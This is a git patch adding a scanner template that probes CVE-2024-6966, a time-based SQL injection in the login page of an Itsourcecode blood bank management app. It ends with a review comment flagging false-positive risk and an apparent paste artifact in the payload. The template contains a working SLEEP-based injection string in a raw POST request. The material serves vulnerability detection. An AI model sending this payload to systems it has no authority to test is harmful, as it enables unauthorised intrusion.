From a42805ff48f4a4dfd81857cc24ababa7ac2bc983 Mon Sep 17 00:00:00 2001
From: cl4irv0yance
Date: Thu, 25 Jul 2024 20:04:28 -0400
Subject: [PATCH] Added template for CVE-2024-6966, issue #10393
---
cve-2024-6966.yaml | 42 ++++++++++++++++++++++++++++++++++++++++++
1 file changed, 42 insertions(+)
create mode 100644 cve-2024-6966.yaml
diff --git a/cve-2024-6966.yaml b/cve-2024-6966.yaml
new file mode 100644
index 00000000000..def1ee9365b
--- /dev/null
+++ b/cve-2024-6966.yaml
@@ -0,0 +1,42 @@
+id: cve-2024-6966
+
+info:
+ name: Itsourcecode Online Blood Bank Management System - Time Based SQL injection in Login Page
+ author: cl4irv0yance
+ description: In the login portal of the Online Blood Bank Management application, it is possible to inject SQL into "user" and exploit time-based SQL injection.
+ severity: High
+ reference:
+ - https://github.com/HermesCui/CVE/issues/1
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-6966
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 7.3
+ cve-id: cve-2024-6966
+ tags: sqli,cve,cve-2024,cve-2024-6966,itsourcecode
+
+
+http:
+ - raw:
+ - |
+ @timeout: 25s
+ POST /login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ tab=on&user=tab%3Don%26user%3D123321%27+AND+%28SELECT+8755+FROM+%28SELECT%28SLEEP%2810%29%29%29xGkg%29+AND+%27emTj%27%3D%27emTj%26pass%3D123123%26sub%3DLog+In%22&pass=test&sub=Log+In
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Username'
+ - 'Password'
+ - 'Keep me Signed in'
+ - 'Forgot Password'
+ - 'Wrong email or password'
+ condition: and
+
+ - type: dsl
+ dsl:
+ - 'duration>=10'
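Review bot: The `dsl` matcher `duration>=10` is the only signal tied to the injection, and the five `word` entries only fingerprint the ordinary failed-login page, so any target that serves this page slowly (load, rate limiting, network latency) would be reported as vulnerable. Pair the delayed request with a control request that carries no delay and require the difference between the two, or at least repeat the timing check, so that a single slow response cannot match. The `user` value also appears to embed a URL-encoded copy of the whole form body (`tab%3Don%26user%3D…%26pass%3D…%26sub%3DLog+In%22`), which looks like a paste artifact and should be checked against the referenced advisory before results from this template are used for triage. Separately, the metadata departs from what I understand to be the usual template conventions: `id: CVE-2024-6966`, `severity: high` and `cve-id: CVE-2024-6966`, plus a `cwe-id: CWE-89` entry under `classification`.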